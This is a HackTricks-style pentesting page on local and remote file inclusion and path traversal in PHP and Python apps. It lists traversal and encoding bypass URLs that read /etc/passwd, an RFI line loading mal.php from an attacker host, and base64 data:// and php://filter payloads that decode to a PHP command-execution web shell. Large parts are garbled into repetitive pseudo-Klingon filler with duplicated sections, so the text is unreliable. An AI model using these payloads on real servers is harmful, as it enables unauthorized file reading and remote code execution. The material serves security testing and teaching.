hacktricks/pentesting-web/file-inclusion/README.md

# File Inclusion/Path traversal

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking

**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights

**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!

## File Inclusion

**Remote File Inclusion (RFI):** The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is **disabled** by default (**allow\_url\_include**).\
**Local File Inclusion (LFI):** The sever loads a local file.

The vulnerability occurs when the user can control in some way the file that is going to be load by the server.

Vulnerable **PHP functions**: require, require\_once, include, include\_once

A interesting tool to exploit this vulnerability: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)

## Blind - Interesting - LFI2RCE files
```python
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
```
### **Linux**

**Mixing several \*nix LFI lists and adding more paths I have created this one:**

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}

Try also to change `/` for `\`\
Try also to add `../../../../../`

A list that uses several techniques to find the file /etc/password (to check if the vulnerability exists) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)

### **Windows**

Merge of different wordlists:

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}

Try also to change `/` for `\`\
Try also to remove `C:/` and add `../../../../../`

A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)

### **OS X**

Check the LFI list of linux.

## Basic LFI and bypasses

All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also (page=[http://myserver.com/phpshellcode.txt\\](http://myserver.com/phpshellcode.txt\)/).
```
http://example.com/index.php?page=../../../etc/passwd
```
### qImHa' 'ej qo'lu'chugh 'e' yIqImHa' 'ej 'e' yIqo'lu'chugh

#### Description

When performing file inclusion attacks, it is common to encounter input sanitization mechanisms that attempt to prevent directory traversal attacks by removing traversal sequences such as "../" or "..\". However, these sanitization mechanisms are often implemented in a non-recursive manner, which means that they only remove one occurrence of a traversal sequence at a time. This can be exploited by an attacker to bypass the sanitization and successfully perform a directory traversal attack.

#### Impact

By exploiting this vulnerability, an attacker can access sensitive files or directories outside of the intended directory structure. This can lead to unauthorized access to confidential information, remote code execution, or other security breaches depending on the specific context and permissions of the vulnerable application.

#### Recommendation

To mitigate this vulnerability, it is recommended to implement a recursive sanitization mechanism that removes all occurrences of traversal sequences in the input. Additionally, it is important to validate and sanitize user input effectively to prevent other types of attacks such as SQL injection or cross-site scripting (XSS). Regular expression-based input validation can be a useful technique to achieve this.

#### Example

Consider a web application that includes files based on user-supplied input without proper sanitization. The application removes "../" from the input to prevent directory traversal attacks. However, the sanitization is implemented non-recursively, allowing an attacker to bypass it by using multiple traversal sequences.

```
GET /page?file=../../../etc/passwd HTTP/1.1
Host: vulnerable-website.com
```

In this example, the attacker is able to access the sensitive file `/etc/passwd` by using multiple traversal sequences. If the sanitization mechanism were implemented recursively, it would remove all occurrences of traversal sequences and prevent this attack.
```python
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```
### **Null byte (%00)**

Bypass the append more chars at the end of the provided string (bypass of: $\_GET\['param']."php")

### **Null byte (%00)**

Bypass the append more chars at the end of the provided string (bypass of: $\_GET\['param']."php")
```
http://example.com/index.php?page=../../../etc/passwd%00
```
**qaStaHvIS PHP 5.4** **Sov**.

### **Encoding**

**non-standard encondings** **vaj** double URL encode (and others) **vaj** **chu'**.
```
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### vIghoS

qatlh backend vItlhutlh. Dochmey path folder vItlhutlh:
```python
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### qawHaq File System Directories on a Server

The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. Below is a detailed method to achieve this:

1. **Determine Directory Depth:**
Ascertain the depth of your current directory by successfully fetching the `/etc/passwd` file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:
```bash
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```
2. **Probe for Folders:**
Append the name of the suspected folder (e.g., `private`) to the URL, then navigate back to `/etc/passwd`. The additional directory level requires incrementing the depth by one:

2. **Qa'Hom vItlhutlh:**
URL DaH jatlh (e.g., `private`) vaj navighegh `/etc/passwd` vay'. vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh
```bash
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```
3. **QapHa'wI'**: 
Server jatlhqa' 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e
```bash
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
### **Qa'Hom QaD**

Qa'Hom QaD, web applications vItlhutlh file paths manipulate method. Qa'Hom QaD, file paths 'ej vItlhutlh security measures bypassing restricted files access laH. Qa'Hom QaD, file path, vItlhutlh security measure, vItlhutlh file pointing 'e' vItlhutlh path crafted.

PHP, file system nature vItlhutlh, file path various representations equivalent considered vIghro'. jatlh:

- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, `/etc/passwd/` path vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh.
- vItlhutlh 6 characters 'e' `passwd` vItlhutlh, `/` (vItlhutlh `passwd/`) vItlhutlh targeted file vItlhutlh vItlhutlh.
- vItlhutlh, `.php` file path vItlhutlh (vItlhutlh `shellcode.php`), `/.` vItlhutlh vItlhutlh file vItlhutlh vItlhutlh.

vItlhutlh examples provided `/etc/passwd` access demonstrate Qa'Hom QaD, sensitive content (user account information) vItlhutlh common target:
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
```

```
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```
### **QIb Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh 
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter
```
## Remote File Inclusion

In php this is disable by default because **`allow_url_include`** is **Off.** It must be **On** for it to work, and in that case you could include a PHP file from your server and get RCE:

## qarDaS Qochbe' File Inclusion

php DaH jImej **`allow_url_include`** **Off** DaH jImej. **On** DaH jImej, 'ej vaj RCE ghaH include PHP file vay' server.
```python
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```
ghobe' **`allow_url_include`** **On** vaj PHP **filtering** **external webpages** **access** **reason** **some** **If**, [according to this post](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), **example** **use** **could** **you** **data protocol** **with base64** **decode** **and** **RCE** **egt** **code PHP** **b64** **a**:

{% code overflow="wrap" %}
```
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```
{% endcode %}

{% hint style="info" %}
In the previous code, the final `+.txt` was added because the attacker needed a string that ended in `.txt`, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).
{% endhint %}

Another example **not using the `php://` protocol** would be:

{% code overflow="wrap" %}
```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```
{% endcode %}

## Python Root element

In python in a code like this one:
```python
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
```
**ghItlhvam** **`file_name`** **absolute path** **user** **cha'logh** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** 